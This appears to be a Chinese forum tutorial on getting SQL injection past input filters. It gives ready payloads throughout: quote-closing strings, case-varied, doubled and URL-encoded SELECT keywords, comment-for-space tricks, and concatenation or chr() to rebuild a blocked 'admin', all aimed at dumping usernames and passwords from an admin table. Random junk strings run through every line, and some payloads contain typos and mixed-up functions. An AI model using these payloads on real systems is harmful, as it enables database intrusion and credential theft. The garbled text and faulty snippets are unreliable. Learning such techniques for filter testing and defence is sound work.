SQL注入。有攻有防。知道进攻。才懂得防守.' v6 R6 l- T. [
4 U4 z7 m4 S5 m( d% P有的时候,很容易受到SQL注入攻击的程序,可能会进行输入过滤,用来防止攻击者无限制的利用其中存在的设计缺陷。4 B% W& s9 Z/ _% O% m
& a; Y$ j7 V- w
唱出会删除或者净化一些字符,或者阻止常用的sql关键词。" G6 Z8 ] x& |% B
" S1 e2 Y! d! m% U/ R我们通常有以下几种技巧,去避开这些过滤。3 B. g) I7 g. l/ P! U( D$ @ V
3 A8 _5 q0 Y1 a1,避免使用被阻止的字符,即不使用这些字符仍然达到攻击目的。* W$ e; p5 l# c" t* n
4 X( Q4 s9 V: X) Q+ M& WA,如果注入一个数字数据字段,就不需要使用单引号。8 z8 t& I2 ~( U1 f
3 p: n1 G$ G* s
B,输入注释符号被阻止使用,我们可以设计注入的数据,既不破坏周围的查询语法。
4 L( G+ M# _3 _7 Y+ C& ~
. B# A" X0 j# D2 Q比如, ?id=1′ 这里存在注入,过滤了注释符合,我们可以输入 ?id=1′ or ‘a’=’a, _ r9 {6 n! s, U+ l4 i
4 r a2 P& ]$ D0 g- D
目的其实很简单,就是把后面的单引号给闭合掉。
- `4 B Z5 n. ]; T) W P8 K0 G0 H2 k
7 T W$ Y) N/ FC,在一个MSSQL注入中注入批量查询的时候,不必使用分号分隔符。
& Y! p0 Z1 w2 a! s
* T. p, i$ z4 h* a- `' @只要纠正所有批量查询的语法,无论你是否使用分号,查询的解析器依然能正确的去解释它们的。9 n) ]; V. y% t! v; K" F e5 t( Y
( w( F2 t2 A9 E0 R1 Z. s2,避免使用简单确认
- x$ ]5 h* ]0 p4 ?' y1 Q4 Q# f- _4 J
一些输入确认机制使用一个简单的黑名单,组织或删除任何出现在这个名单中的数据,比如防注入程序。) T2 e: A* H' I% U5 D$ Q* Q
. W" Z; a! f7 m
这一般要看这个机制是否做的足够的好了,黑名单是否足够能确保安全。如果只是简单的黑名单,那也有机会突破的。# r( L( T/ D) o
3 U7 i9 t9 k* J3 v4 CA,如果select关键词被阻止或删除
% m, c) Q7 y5 x. M/ q. m; k6 G/ \/ ?
我们可以输入:
% R- E( Y0 G8 B* o+ g5 [5 O' `0 B% r! X+ G; L9 D& j5 @
SeLeCt 注意大小写/ M" Q0 |, k* W; n
# N5 ?9 K5 o- @1 Y3 ~" _selselectect 还记得ewebeditor是怎么过滤asp的么?; D) V7 d4 l9 ?9 ~: z7 D
& L0 \; R" J; y* i [%53%45%4c%45%43%54 URL编码
7 X* u k$ v+ I- ^, s& h! c1 U
0 ?4 U* X8 W* ^: P%2553%2545%254c%2545%2543%2554 对上面的每个%后加了一个256 I( O& \/ M) n1 }4 h8 S3 t: T
" W3 V0 Y% S- l. b' @* f2 K- C
3,使用SQL注释符
0 V t2 Q k( @; x5 D3 w, y! h1 a, E* e6 _% Q f
A,使用注释来冒充注入的数据中的空格。; c. n Y+ d( A% n6 z
( Q. V+ ?) ?! l+ Y+ Yselect/*yesu*/username,password/*yesu*/from/*yesu*/admin5 m' A3 p4 g- Y3 t
4 T, ~9 h3 L! s- [: S/*yesu*/来冒充空格
. b+ W$ L; ^3 l# T3 q4 T8 F
9 k9 l! }! a9 v8 u. O2 Y9 sB,使用注释来避开某些注入的确认过滤。: N8 Q2 N$ P$ b; `
6 s4 B" N& n- [SEL/*yesu*/ECT username,password fr/*yesu*/om admin, R4 S @$ S) f$ k
. J8 ^* Z5 k Q1 Q: j! Z! B- V' `" {4,处理被阻止的字符串
; @, T8 _1 B( U# u: k
6 ]" W$ `$ N& q+ y比如,程序阻止了admin,因为怕攻击者注入admin表单中的数据。 K/ I) U% n6 k3 ]$ k' o9 q
+ T* z& j! m4 U# R
我们可以这样
0 g' F$ Q4 N4 Y, ~0 W7 H8 C
( B: K g- L& }- HA,oracle数据库: ‘adm’||’in’
4 H) A/ P! o' I# R+ e- O
. \# B% Y: u' q$ PB,MSSQL数据库: ‘adm’+’in’
* K7 U4 l2 `4 d4 t8 G! _1 V# S5 g
C,MYSQL数据库: concat (‘adm’,’in’)
/ [: ]4 U" Z+ l$ j$ _) Q. n2 \; B$ g6 d
D,oracle中如果单引号被阻止了,还可以用chr函数1 o* S6 X; N" q7 ]# P
; S) g" b: E0 l/ D1 V! [
sleect password from admin where username = char(97) || chr(100) || chr(109) || chr(105) || chr(110)
3 y8 [1 v- R9 t( V) a) {6 }9 f; u# ?, }/ W* E
还有其他方法。正在收集中.
, h; m* A9 q) q' J! |, v
6 g3 X* o2 ~/ J j; m, d* {% h |